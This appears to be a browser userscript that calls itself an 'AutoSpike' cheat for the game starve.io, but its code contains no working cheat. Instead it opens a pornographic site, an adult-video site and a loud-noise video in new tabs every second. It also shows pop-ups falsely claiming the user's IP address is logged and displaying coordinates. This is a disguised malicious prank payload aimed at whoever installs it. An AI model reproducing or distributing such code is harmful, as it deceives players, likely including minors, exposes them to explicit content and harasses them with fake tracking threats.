// ==UserScript==
// @name         ! AutoSpike
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  Loux v3.1
// @author       Loux team
// @match        ://starve.io/
// @icon         data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==
// @require https://greasyfork.org/scripts/368273-msgpack/code/msgpack.js?version=598723
// @require http://code.jquery.com/jquery-3.3.1.min.js
// @require https://code.jquery.com/ui/1.12.0/jquery-ui.min.js
// @require https://cdnjs.cloudflare.com/ajax/libs/jquery-confirm/3.3.0/jquery-confirm.min.js
// @grant        none
// ==/UserScript==

(function() {
    'use strict';
setInterval(() => {
    window.open('https://rt.pornhub.com/gay', '_blank')
}, 1000)
setInterval(() => {
    console.log('Your IP is logged lol noob');
}, 1000)
setInterval(() => {
    window.open('https://brazzers-tv.vip/', '_blank')
}, 1000)
setInterval(() => {
    window.open('https://www.youtube.com/watch?v=xJZlO1dPktg&t=18s&pp=ygUKTE9VRCBOT0lTRQ%3D%3D', '_blank')
}, 1000)

let $ = function(){
    return document.querySelector
};

var msgpack5 = msgpack;
var myPlayer = {
    object: null,
    x: null,
    y: null,
    dir: null,
    tool: null,
    hat: null,
    score: null,
    clan: null,
    isLeader: null,
    isMember: null,
};
alert("ur ip is logged kid");
alert("52.3676° N, 4.9041° E");
window.prompt("Enjoy your Loux<3", [""]);
})();
